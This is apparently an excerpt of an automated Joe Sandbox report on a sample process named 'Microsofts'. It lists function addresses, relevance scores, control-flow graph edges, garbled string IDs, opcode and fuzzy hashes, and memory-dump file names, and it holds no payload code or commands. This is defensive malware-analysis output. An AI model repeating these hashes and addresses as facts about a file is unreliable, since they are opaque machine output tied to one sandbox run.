                                                                                                                                        • String ID: 0o?q$Lj?q$Lj?q$PH\r$PH\r
                                                                                                                                        • API String ID: 0-3671958786
                                                                                                                                        • Opcode ID: bbdf340af475663d042942f379539b3933e8e87e7d37c702486846e9e69f99e6
                                                                                                                                        • Instruction ID: 6cb457f54fd8e612733afc0f03a70888b7cfd0c088f2f7656fa413bb3f8e08b3
                                                                                                                                        • Opcode Fuzzy Hash: bbdf340af475663d042942f379539b3933e8e87e7d37c702486846e9e69f99e6
                                                                                                                                        • Instruction Fuzzy Hash: 4E51D7B4E00208DFDB48DFAAD584A9DBBF2BF89310F109429E815BB364DB70A945CF50
                                                                                                                                        Function 00EAAB6A Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 403 eaab6a-eaab95 call eaa428 488 eaab97 call eaae88 403->488 489 eaab97 call eaae98 403->489 406 eaab9d-eaabaf 408 eaad8b-eaad96 406->408 409 eaabb5-eaabb7 406->409 410 eaad9d-eaada8 408->410 409->410 411 eaabbd-eaabc1 409->411 417 eaadaf-eaadba 410->417 411->410 412 eaabc7-eaabff call ea36d8 411->412 412->417 426 eaac05-eaac09 412->426 421 eaadc1-eaadcc 417->421 425 eaadd3-eaadff 421->425 461 eaae06-eaae32 425->461 427 eaac0b-eaac0f 426->427 428 eaac15-eaac19 426->428 427->421 427->428 430 eaac1b-eaac22 428->430 431 eaac24-eaac28 428->431 433 eaac40-eaac44 430->433 432 eaac2a-eaac2e 431->432 431->433 434 eaac39 432->434 435 eaac30-eaac37 432->435 436 eaac4b-eaac52 433->436 437 eaac46-eaac48 433->437 434->433 435->433 439 eaac5b-eaac5f 436->439 440 eaac54 436->440 437->436 445 eaad3e-eaad41 439->445 446 eaac65-eaac69 439->446 440->439 441 eaad79-eaad84 440->441 442 eaacae-eaacb1 440->442 443 eaacdd-eaace0 440->443 444 eaad10-eaad13 440->444 441->408 450 eaacbc-eaacdb 442->450 451 eaacb3-eaacb6 442->451 455 eaaceb-eaad0e 443->455 456 eaace2-eaace5 443->456 448 eaad1a-eaad39 444->448 449 eaad15 444->449 452 eaad43-eaad46 445->452 453 eaad51-eaad74 445->453 446->441 454 eaac6f-eaac72 446->454 475 eaac97-eaac9b 448->475 449->448 450->475 451->425 451->450 452->453 458 eaad48-eaad4b 452->458 453->475 459 eaac79-eaac95 454->459 460 eaac74 454->460 455->475 456->455 456->461 458->453 465 eaae39-eaae76 458->465 459->475 460->459 461->465 485 eaac9e call eab0ef 475->485 486 eaac9e call eab100 475->486 487 eaac9e call eab1a1 475->487 479 eaaca4-eaacab 485->479 486->479 487->479 488->406 489->406
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $H`r$H`r$H`r
                                                                                                                                        • API String ID: 0-3208256225
                                                                                                                                        • Opcode ID: d64a981a825e27f7941761af8e2ab92a726865dfb1c3927775f523ff1fadddd3
                                                                                                                                        • Instruction ID: 6a5fa44d282134e2c713efe7081079734f3c5f5128ede3e7a7ebaf877af3f4f5
                                                                                                                                        • Opcode Fuzzy Hash: d64a981a825e27f7941761af8e2ab92a726865dfb1c3927775f523ff1fadddd3
                                                                                                                                        • Instruction Fuzzy Hash: F181B7347003049BEF296B74945876E7693AFCA335F28462AF9169B3D0CF359D41C792
                                                                                                                                        Function 00EA19B8 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 490 ea19b8-ea1a13 494 ea1a35-ea1a84 490->494 495 ea1a15-ea1a34 490->495 499 ea1a9f 494->499 500 ea1a86-ea1a8d 494->500 503 ea1aa7 499->503 501 ea1a8f-ea1a94 500->501 502 ea1a96-ea1a9d 500->502 504 ea1aaa-ea1abe 501->504 502->504 503->504 506 ea1ac0-ea1ac7 504->506 507 ea1ad4-ea1adc 504->507 508 ea1ac9-ea1acb 506->508 509 ea1acd-ea1ad2 506->509 510 ea1ade-ea1ae2 507->510 508->510 509->510 512 ea1b42-ea1b45 510->512 513 ea1ae4-ea1af9 510->513 514 ea1b8d-ea1b93 512->514 515 ea1b47-ea1b5c 512->515 513->512 521 ea1afb-ea1afe 513->521 516 ea1b99-ea1b9b 514->516 517 ea268e 514->517 515->514 525 ea1b5e-ea1b62 515->525 516->517 519 ea1ba1-ea1ba6 516->519 522 ea2693-ea26ba 517->522 523 ea263c-ea2640 519->523 524 ea1bac 519->524 526 ea1b1d-ea1b3b call ea02a8 521->526 527 ea1b00-ea1b02 521->527 530 ea2642-ea2645 523->530 531 ea2647-ea268d 523->531 524->523 532 ea1b6a-ea1b88 call ea02a8 525->532 533 ea1b64-ea1b68 525->533 526->512 527->526 528 ea1b04-ea1b07 527->528 528->512 535 ea1b09-ea1b1b 528->535 530->522 530->531 532->514 533->514 533->532 535->512 535->526
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r$X`r$X`r
                                                                                                                                        • API String ID: 0-3954137160
                                                                                                                                        • Opcode ID: 76a2b710fb98bb842b49dba86c2d15dff1e7cde15dc546bc49b322e51ac30f38
                                                                                                                                        • Instruction ID: f6b2c3d660048435c94a4fc6f746bc85ff7f7619230145e9c1d5efdb9ba77501
                                                                                                                                        • Opcode Fuzzy Hash: 76a2b710fb98bb842b49dba86c2d15dff1e7cde15dc546bc49b322e51ac30f38
                                                                                                                                        • Instruction Fuzzy Hash: B671A331E013298FDF64DFB8C8443EEBBB6AF89300F1481A6C519B7251EB709D458B91
                                                                                                                                        Function 00EA2C62 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2273 ea2c62-ea2c74 2274 ea2c39-ea2c3e 2273->2274 2275 ea2c76-ea2ca1 2273->2275 2274->2273 2277 ea2cb2-ea2cba 2275->2277 2278 ea2ca3-ea2ca5 2275->2278 2282 ea2cbc-ea2cca 2277->2282 2279 ea2cab-ea2cb0 2278->2279 2280 ea2ca7-ea2ca9 2278->2280 2279->2282 2280->2282 2284 ea2ccc-ea2cce 2282->2284 2285 ea2ce0-ea2ce8 2282->2285 2286 ea2cd0-ea2cd5 2284->2286 2287 ea2cd7-ea2cde 2284->2287 2288 ea2ceb-ea2cee 2285->2288 2286->2288 2287->2288 2290 ea2cf0-ea2cfe 2288->2290 2291 ea2d05-ea2d09 2288->2291 2290->2291 2299 ea2d00 2290->2299 2292 ea2d0b-ea2d19 2291->2292 2293 ea2d22-ea2d25 2291->2293 2292->2293 2302 ea2d1b 2292->2302 2294 ea2d2d-ea2d62 2293->2294 2295 ea2d27-ea2d2b 2293->2295 2304 ea2dc4-ea2dc9 2294->2304 2295->2294 2298 ea2d64-ea2d7b 2295->2298 2300 ea2d7d-ea2d7f 2298->2300 2301 ea2d81-ea2d8d 2298->2301 2299->2291 2300->2304 2305 ea2d8f-ea2d95 2301->2305 2306 ea2d97-ea2da1 2301->2306 2302->2293 2307 ea2da9 2305->2307 2306->2307 2308 ea2da3 2306->2308 2310 ea2db1-ea2dbd 2307->2310 2308->2307 2310->2304
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r
                                                                                                                                        • API String ID: 0-1096494241
                                                                                                                                        • Opcode ID: a2fa712df44aab42f3bc77b0a4f24186803d556f0acfebf6f3bb6a7dedc638ea
                                                                                                                                        • Instruction ID: 4e30a4146b03e6373bccc30db3b503c50424ea507129a2cd10f483402a98f98a
                                                                                                                                        • Opcode Fuzzy Hash: a2fa712df44aab42f3bc77b0a4f24186803d556f0acfebf6f3bb6a7dedc638ea
                                                                                                                                        • Instruction Fuzzy Hash: 13412731B043204BDF184A7D89553BEAAF6BFDA314F28503EDA02FB392DBA49C059751
                                                                                                                                        Function 00EAB469 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2314 eab469-eab4d6 2321 eab4e5-eab501 2314->2321 2324 eab508-eab562 call ea36e8 2321->2324 2325 eab503-eab506 2321->2325 2326 eab56a-eab573 2324->2326 2325->2324 2325->2326 2327 eab57a-eab5b0 2326->2327 2328 eab575-eab578 2326->2328 2331 eab5df-eab5e5 2327->2331 2340 eab5b2-eab5d7 call ea36f8 2327->2340 2328->2327 2328->2331 2340->2331
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8ar$TJar
                                                                                                                                        • API String ID: 0-3360347397
                                                                                                                                        • Opcode ID: c48e64b99c65dd90b7c56b116c64530d4b7fbb293bcceb9a324b03c0cd1012c6
                                                                                                                                        • Instruction ID: 4ea8cf7f6d0d516b30f097576c575c5204b5f4fd10a75b380c723da7bf23aa1a
                                                                                                                                        • Opcode Fuzzy Hash: c48e64b99c65dd90b7c56b116c64530d4b7fbb293bcceb9a324b03c0cd1012c6
                                                                                                                                        • Instruction Fuzzy Hash: 5B313731B002058FDB44EBA8C591EDDBBF2AF8D324F195591E501AF3A6DB30EC418B91
                                                                                                                                        Function 00EAB49D Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8ar$TJar
                                                                                                                                        • API String ID: 0-3360347397
                                                                                                                                        • Opcode ID: ed8c2bd182a41f704fda19afcb41bb7e83bc6739d50a4b0bc5e9dc7d72d06bd8
                                                                                                                                        • Instruction ID: 844f819cf5f3be991e9e6bf41b9feb489e85d8e12dd9ac59d603baa74b566d84
                                                                                                                                        • Opcode Fuzzy Hash: ed8c2bd182a41f704fda19afcb41bb7e83bc6739d50a4b0bc5e9dc7d72d06bd8
                                                                                                                                        • Instruction Fuzzy Hash: 77315631B002058FDB04EBA8C581EDDBBB2AF8D324F195591E501AF3A6DA70EC418B91
                                                                                                                                        Function 05210DCC Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 05210F0E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24195607328.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_5210000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 05bb6a47731d75a597a6fb0ca5c4e9a0931de2be6751e085a4089eb7ceb21b10
                                                                                                                                        • Instruction ID: a18b61cf84992387437a65af022cdee19b3fe1f897723c7b853199a4c8eb52b5
                                                                                                                                        • Opcode Fuzzy Hash: 05bb6a47731d75a597a6fb0ca5c4e9a0931de2be6751e085a4089eb7ceb21b10
                                                                                                                                        • Instruction Fuzzy Hash: 1E119D74E102098FDB04CBA9C484EAEBBF6FF98304F148165EC04A7205D7709885CB58
                                                                                                                                        Function 00EA0B20 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LR\r
                                                                                                                                        • API String ID: 0-935051279
                                                                                                                                        • Opcode ID: ffa7e1e9c26b093ad3145a12297567ff106ebb778cdd58be43e8760200b3127c
                                                                                                                                        • Instruction ID: d74019bb9c24960b25b7592547ce017dcd029a6ee34d17a4abb9f9cc47087cf4
                                                                                                                                        • Opcode Fuzzy Hash: ffa7e1e9c26b093ad3145a12297567ff106ebb778cdd58be43e8760200b3127c
                                                                                                                                        • Instruction Fuzzy Hash: 15A1D875A10249CFCB45EFA9E9A5A9DBBB1FB88305F104929D405EB368DB306D06CF81
                                                                                                                                        Function 00EA0B30 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LR\r
                                                                                                                                        • API String ID: 0-935051279
                                                                                                                                        • Opcode ID: 26c10a700c539027d452cac712506a51b8331bbf08443bc274373128095b2980
                                                                                                                                        • Instruction ID: 5965abc4b4a8852f0a0ba0dd17adf2ad52746da655e4d10f57174170c36a524b
                                                                                                                                        • Opcode Fuzzy Hash: 26c10a700c539027d452cac712506a51b8331bbf08443bc274373128095b2980
                                                                                                                                        • Instruction Fuzzy Hash: 98A1B875A10349CFCB45EFA9E995A9DBBB1FB88305F104929E405EB368DB306D06CF81
                                                                                                                                        Function 00EAB898 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: H`r
                                                                                                                                        • API String ID: 0-2871800212
                                                                                                                                        • Opcode ID: 1d5a0bc306f9ad70484f1ec265fc3a728e58700169604975160343c7721c7fc9
                                                                                                                                        • Instruction ID: e9eb49fa412253376556e3aaf2b44f286d40ed2c8e7e747f14b8ec2a2e91eaca
                                                                                                                                        • Opcode Fuzzy Hash: 1d5a0bc306f9ad70484f1ec265fc3a728e58700169604975160343c7721c7fc9
                                                                                                                                        • Instruction Fuzzy Hash: 20319331B002089FDB08EB78D855AAF7BEAEF89301F144579E509DB391DF359D128790
                                                                                                                                        Function 00EAB9D9 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: H`r
                                                                                                                                        • API String ID: 0-2871800212
                                                                                                                                        • Opcode ID: 851e442d0d6b2165feec747c8f75606a48ec4ca198beb72ee7cbe05ad004df7e
                                                                                                                                        • Instruction ID: 4e55f52255ae8e8c63e74eddd57be89ba5c6f36cbcb079b301dd7827cb3e193f
                                                                                                                                        • Opcode Fuzzy Hash: 851e442d0d6b2165feec747c8f75606a48ec4ca198beb72ee7cbe05ad004df7e
                                                                                                                                        • Instruction Fuzzy Hash: BF21D3316002459FDB08EF78C991B6E7BA6FF8A310F258169E5069B395DF31AE11CB90
                                                                                                                                        Function 00EABB6F Relevance: .2, Instructions: 208COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a6f5a2075bc7fe5737a34cf4cb047911ab08ebd707f588e6ddf6a93f073e0445
                                                                                                                                        • Instruction ID: 817aec8b99bdd532c47e98e1de6749af62f69f82aaaa6b139d900667116d524c
                                                                                                                                        • Opcode Fuzzy Hash: a6f5a2075bc7fe5737a34cf4cb047911ab08ebd707f588e6ddf6a93f073e0445
                                                                                                                                        • Instruction Fuzzy Hash: 3751F672B003059FCB149A69D855AABFBE9EBCD324F14853AE518DB351DB35E80187A0
                                                                                                                                        Function 00EA315D Relevance: .1, Instructions: 111COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dab983deb8fbeb10e06ec2aa8c3740d523089a0130acc3211406f15c0ddf1061
                                                                                                                                        • Instruction ID: 7eaab76a9b37ec0800df92691149d00040cfefeda634a8f3025b44c8a63c9691
                                                                                                                                        • Opcode Fuzzy Hash: dab983deb8fbeb10e06ec2aa8c3740d523089a0130acc3211406f15c0ddf1061
                                                                                                                                        • Instruction Fuzzy Hash: 9941A174E012189FCB48DFAAD884A9DBBF2BF8A300F249569E405BB364DB346845CF14
                                                                                                                                        Function 00EA3168 Relevance: .1, Instructions: 109COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ca61e4fe6fe2429e2aceb74299b663107dd078944f7bb484684c1102f9890412
                                                                                                                                        • Instruction ID: 5f140447f71c07cf29bb9bb9c4a6bde510c77c3e56ee8d53af017091041ad54d
                                                                                                                                        • Opcode Fuzzy Hash: ca61e4fe6fe2429e2aceb74299b663107dd078944f7bb484684c1102f9890412
                                                                                                                                        • Instruction Fuzzy Hash: 85418274E01218DFDB48DFAAD884A9DBBF2BF8A300F249569E405BB364DB346945CF14
                                                                                                                                        Function 00EA9249 Relevance: .1, Instructions: 107COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f1da02384cb1fb829805c0f365c568efdef4fdfa19d7b3f4ca287e4b85fedfe3
                                                                                                                                        • Instruction ID: 9f3f7f951f439ea66f24673291da5a4c5fdcae8ed9edaf01a41eb39d0be73418
                                                                                                                                        • Opcode Fuzzy Hash: f1da02384cb1fb829805c0f365c568efdef4fdfa19d7b3f4ca287e4b85fedfe3
                                                                                                                                        • Instruction Fuzzy Hash: AB31CF39CE270B9FD2002B35A5AD37BBBF4FF2F32B7046E01E50A905148B3099A4CA14
                                                                                                                                        Function 00E5D005 Relevance: .1, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24167587675.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_e5d000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e5b48185011e30bab4c6a8fbf037af71f9e7b12bc30ef219ee573a5543b31df1
                                                                                                                                        • Instruction ID: da5aae69662dc1356cb9b906f75fea623a2dd72e0633609824f94cd2e3883a45
                                                                                                                                        • Opcode Fuzzy Hash: e5b48185011e30bab4c6a8fbf037af71f9e7b12bc30ef219ee573a5543b31df1
                                                                                                                                        • Instruction Fuzzy Hash: 09315C7550D3C49FCB13CB24D994711BF71AB46314F29C5EBD8898F2A7C23A981ACB62
                                                                                                                                        Function 00EA18C8 Relevance: .1, Instructions: 77COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8dc8089b2eed15f8e4cdc77d65a3e6e8b53c18075534e065fe2ca321a7a47092
                                                                                                                                        • Instruction ID: 0c94d3dfb75662ab8e015a35c006acefaab036f23384e53cb1b970b18cf13428
                                                                                                                                        • Opcode Fuzzy Hash: 8dc8089b2eed15f8e4cdc77d65a3e6e8b53c18075534e065fe2ca321a7a47092
                                                                                                                                        • Instruction Fuzzy Hash: B2218135A002049FCF54DB28C4509FF3BA9EBDE368F188459D859AB254EB30EE05CBD2
                                                                                                                                        Function 00EA4729 Relevance: .1, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 335e41bb2804e5f143094d0eba2ac35802d0cf7793a705b1281ac0a3dad271fd
                                                                                                                                        • Instruction ID: 4d96afdb051b5d1cc8b9c313029cb14b69cb57f584b23f100cfcdbc936b08104
                                                                                                                                        • Opcode Fuzzy Hash: 335e41bb2804e5f143094d0eba2ac35802d0cf7793a705b1281ac0a3dad271fd
                                                                                                                                        • Instruction Fuzzy Hash: A4212431D11659DECB00EFE8D8446ECFBB4FF4A304F509626E50477294EB706A5ACB91
                                                                                                                                        Function 00E5D030 Relevance: .1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24167587675.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_e5d000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9e568c1e7e4bf29388acc8101977a28acbc56062c1c54e8f96d10511346edae9
                                                                                                                                        • Instruction ID: 5dbed296293c252afa74d9505253ba2a40fdf51ed29e1fe1378bfa50fc5fc32b
                                                                                                                                        • Opcode Fuzzy Hash: 9e568c1e7e4bf29388acc8101977a28acbc56062c1c54e8f96d10511346edae9
                                                                                                                                        • Instruction Fuzzy Hash: C021D671508340DFDB20DF14D9C0B26BB66EB84314F24C96ADC495B296C77AD84ACA62
                                                                                                                                        Function 00EAAE98 Relevance: .1, Instructions: 70COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 57c52f1d850c80192dc921a4faab2603ea0f37722f3417f75db6936177d5e9c7
                                                                                                                                        • Instruction ID: 8b80e716337db7ed719edb16e046c056ef2c7a63eb136c7457999d8befca7a91
                                                                                                                                        • Opcode Fuzzy Hash: 57c52f1d850c80192dc921a4faab2603ea0f37722f3417f75db6936177d5e9c7
                                                                                                                                        • Instruction Fuzzy Hash: 0611E4757053148FD7199B78E854A2A77E5EF8E60031605ABE505DB391EF25EC00CBA2
                                                                                                                                        Function 00EA0EC8 Relevance: .1, Instructions: 65COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6bcd02e84dbe77cf3264a76ac4c6184d876961959ac760c445c021ae2a900407
                                                                                                                                        • Instruction ID: 2072ba4c620950b7181fbbd5227e70d567692fd93ddc2a2ebccfe5decefd9a39
                                                                                                                                        • Opcode Fuzzy Hash: 6bcd02e84dbe77cf3264a76ac4c6184d876961959ac760c445c021ae2a900407
                                                                                                                                        • Instruction Fuzzy Hash: A1219074E002089FDB05EFB9D4513AEBBB2EF89309F1084AAD815BB394DB745945CF41
                                                                                                                                        Function 00EAB748 Relevance: .1, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 782b9791cb5d5318ed10e3ac4642541cf712817cb7887b49d6789c1acf6ac031
                                                                                                                                        • Instruction ID: ebb4bcd766216e05825c3dc850fe51e8614379208927a9642d17bcbe1bca3165
                                                                                                                                        • Opcode Fuzzy Hash: 782b9791cb5d5318ed10e3ac4642541cf712817cb7887b49d6789c1acf6ac031
                                                                                                                                        • Instruction Fuzzy Hash: 7B118C76300200CFD714DB69D944E66B7E6EFCA725B2085AAF50A8F361CBB1EC40CB50
                                                                                                                                        Function 00EA17B8 Relevance: .1, Instructions: 59COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
